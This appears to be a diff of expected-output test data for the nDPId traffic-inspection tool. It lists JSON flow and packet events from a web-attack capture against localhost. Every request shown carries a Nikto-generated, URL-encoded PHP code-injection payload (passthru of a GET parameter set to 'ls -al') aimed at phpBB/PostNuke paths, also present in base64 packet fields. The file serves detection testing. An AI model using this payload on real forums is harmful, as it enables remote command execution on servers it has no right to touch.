00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 